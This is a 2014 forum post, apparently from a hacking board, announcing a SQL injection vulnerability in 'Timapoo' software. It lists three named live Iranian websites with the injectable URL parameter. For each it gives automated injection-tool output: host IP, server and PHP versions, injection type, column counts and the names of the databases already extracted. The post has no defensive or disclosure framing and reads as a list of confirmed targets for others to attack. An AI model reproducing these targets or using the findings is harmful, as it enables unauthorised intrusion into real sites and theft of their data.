PDA

View Full Version : Timapoo SQLi Vulnerability



Server_CM
10-20-2014, 07:42 PM
Timapoo SQLi Vulnerability
Demo site :


http://hqazvintennis.ir/dynamic.php?sys=faq&action=new&la=en
Analyzing
http://hqazvintennis.ir/dynamic.php?sys=faq&action=new&la=en
Host IP: 5.61.24.22
Web Server: Apache/2
Powered-by: PHP/5.2.9
Keyword Found: margin:
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 1
Injection type is String (')
Valid String Column is 1
Current DB: hqazvin000_faghn




http://www.niarak.ir/dynamic.php?sys=faq&action=new&la=en
Analyzing
http://www.niarak.ir/dynamic.php?sys=faq&action=new&la=en
Host IP: 5.61.24.22
Web Server: Apache/2
Powered-by: PHP/5.2.9
Keyword Found:  ????
Injection type is String (')
Keyword corrected: Contact
DB Server: MySQL >=5
Selected Column Count is 1
Injection type is String (')
Valid String Column is 1
Current DB: poyanweb_coms




http://www.ppit.ir/dynamic.php?sys=faq&la=fa
Analyzing
http://www.ppit.ir/dynamic.php?sys=faq&la=fa
Host IP: 5.61.24.22
Web Server: Apache/2
Powered-by: PHP/5.2.9
Keyword Found: ??????
Injection type is String (')
Keyword corrected: {DISPLAY:
DB Server: MySQL >=5
Selected Column Count is 6
Valid String Column is 3
Current DB: bimeh2443_coms